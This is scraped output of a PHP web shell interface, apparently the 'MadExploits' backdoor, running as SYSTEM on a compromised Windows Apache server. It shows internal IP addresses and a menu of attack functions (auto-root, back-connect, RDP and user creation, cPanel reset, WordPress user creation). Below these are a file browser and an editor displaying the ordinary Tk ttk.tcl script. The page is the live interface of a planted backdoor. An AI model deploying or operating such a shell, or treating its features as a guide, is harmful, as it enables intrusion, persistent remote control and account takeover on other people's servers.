Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
python /
python-3.10 /
tcl /
tk8.6 /
ttk /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
altTheme.tcl
3.63
KB
-rw-rw-rw-
aquaTheme.tcl
3.75
KB
-rw-rw-rw-
button.tcl
2.94
KB
-rw-rw-rw-
clamTheme.tcl
4.7
KB
-rw-rw-rw-
classicTheme.tcl
3.77
KB
-rw-rw-rw-
combobox.tcl
12.42
KB
-rw-rw-rw-
cursors.tcl
4.71
KB
-rw-rw-rw-
defaults.tcl
4.45
KB
-rw-rw-rw-
entry.tcl
17.2
KB
-rw-rw-rw-
fonts.tcl
5.6
KB
-rw-rw-rw-
menubutton.tcl
6.49
KB
-rw-rw-rw-
notebook.tcl
5.69
KB
-rw-rw-rw-
panedwindow.tcl
2.24
KB
-rw-rw-rw-
progress.tcl
1.11
KB
-rw-rw-rw-
scale.tcl
2.72
KB
-rw-rw-rw-
scrollbar.tcl
3.21
KB
-rw-rw-rw-
sizegrip.tcl
2.44
KB
-rw-rw-rw-
spinbox.tcl
4.89
KB
-rw-rw-rw-
treeview.tcl
9.94
KB
-rw-rw-rw-
ttk.tcl
4.88
KB
-rw-rw-rw-
utils.tcl
8.42
KB
-rw-rw-rw-
vistaTheme.tcl
9.48
KB
-rw-rw-rw-
winTheme.tcl
2.8
KB
-rw-rw-rw-
xpTheme.tcl
2.05
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ttk.tcl
# # Ttk widget set initialization script. # ### Source library scripts. # namespace eval ::ttk { variable library if {![info exists library]} { set library [file dirname [info script]] } } source -encoding utf-8 [file join $::ttk::library fonts.tcl] source -encoding utf-8 [file join $::ttk::library cursors.tcl] source -encoding utf-8 [file join $::ttk::library utils.tcl] ## ttk::deprecated $old $new -- # Define $old command as a deprecated alias for $new command # $old and $new must be fully namespace-qualified. # proc ttk::deprecated {old new} { interp alias {} $old {} ttk::do'deprecate $old $new } ## do'deprecate -- # Implementation procedure for deprecated commands -- # issue a warning (once), then re-alias old to new. # proc ttk::do'deprecate {old new args} { deprecated'warning $old $new interp alias {} $old {} $new uplevel 1 [linsert $args 0 $new] } ## deprecated'warning -- # Gripe about use of deprecated commands. # proc ttk::deprecated'warning {old new} { puts stderr "$old deprecated -- use $new instead" } ### Backward-compatibility. # # # Make [package require tile] an effective no-op; # see SF#3016598 for discussion. # package ifneeded tile 0.8.6 { package provide tile 0.8.6 } # ttk::panedwindow used to be named ttk::paned. Keep the alias for now. # ::ttk::deprecated ::ttk::paned ::ttk::panedwindow ### ::ttk::ThemeChanged -- # Called from [::ttk::style theme use]. # Sends a <<ThemeChanged>> virtual event to all widgets. # proc ::ttk::ThemeChanged {} { set Q . while {[llength $Q]} { set QN [list] foreach w $Q { event generate $w <<ThemeChanged>> foreach child [winfo children $w] { lappend QN $child } } set Q $QN } } ### Public API. # proc ::ttk::themes {{ptn *}} { set themes [list] foreach pkg [lsearch -inline -all -glob [package names] ttk::theme::$ptn] { lappend themes [namespace tail $pkg] } return $themes } ## ttk::setTheme $theme -- # Set the current theme to $theme, loading it if necessary. # proc ::ttk::setTheme {theme} { variable currentTheme ;# @@@ Temp -- [::ttk::style theme use] doesn't work if {$theme ni [::ttk::style theme names]} { package require ttk::theme::$theme } ::ttk::style theme use $theme set currentTheme $theme } ### Load widget bindings. # source -encoding utf-8 [file join $::ttk::library button.tcl] source -encoding utf-8 [file join $::ttk::library menubutton.tcl] source -encoding utf-8 [file join $::ttk::library scrollbar.tcl] source -encoding utf-8 [file join $::ttk::library scale.tcl] source -encoding utf-8 [file join $::ttk::library progress.tcl] source -encoding utf-8 [file join $::ttk::library notebook.tcl] source -encoding utf-8 [file join $::ttk::library panedwindow.tcl] source -encoding utf-8 [file join $::ttk::library entry.tcl] source -encoding utf-8 [file join $::ttk::library combobox.tcl] ;# dependency: entry.tcl source -encoding utf-8 [file join $::ttk::library spinbox.tcl] ;# dependency: entry.tcl source -encoding utf-8 [file join $::ttk::library treeview.tcl] source -encoding utf-8 [file join $::ttk::library sizegrip.tcl] ## Label and Labelframe bindings: # (not enough to justify their own file...) # bind TLabelframe <<Invoke>> { tk::TabToWindow [tk_focusNext %W] } bind TLabel <<Invoke>> { tk::TabToWindow [tk_focusNext %W] } ### Load settings for built-in themes: # proc ttk::LoadThemes {} { variable library # "default" always present: uplevel #0 [list source -encoding utf-8 [file join $library defaults.tcl]] set builtinThemes [style theme names] foreach {theme scripts} { classic classicTheme.tcl alt altTheme.tcl clam clamTheme.tcl winnative winTheme.tcl xpnative {xpTheme.tcl vistaTheme.tcl} aqua aquaTheme.tcl } { if {[lsearch -exact $builtinThemes $theme] >= 0} { foreach script $scripts { uplevel #0 [list source -encoding utf-8 [file join $library $script]] } } } } ttk::LoadThemes; rename ::ttk::LoadThemes {} ### Select platform-specific default theme: # # Notes: # + On OSX, aqua theme is the default # + On Windows, xpnative takes precedence over winnative if available. # + On X11, users can use the X resource database to # specify a preferred theme (*TkTheme: themeName); # otherwise "default" is used. # proc ttk::DefaultTheme {} { set preferred [list aqua vista xpnative winnative] set userTheme [option get . tkTheme TkTheme] if {$userTheme ne {} && ![catch { uplevel #0 [list package require ttk::theme::$userTheme] }]} { return $userTheme } foreach theme $preferred { if {[package provide ttk::theme::$theme] ne ""} { return $theme } } return "default" } ttk::setTheme [ttk::DefaultTheme] ; rename ttk::DefaultTheme {} #*EOF*
Close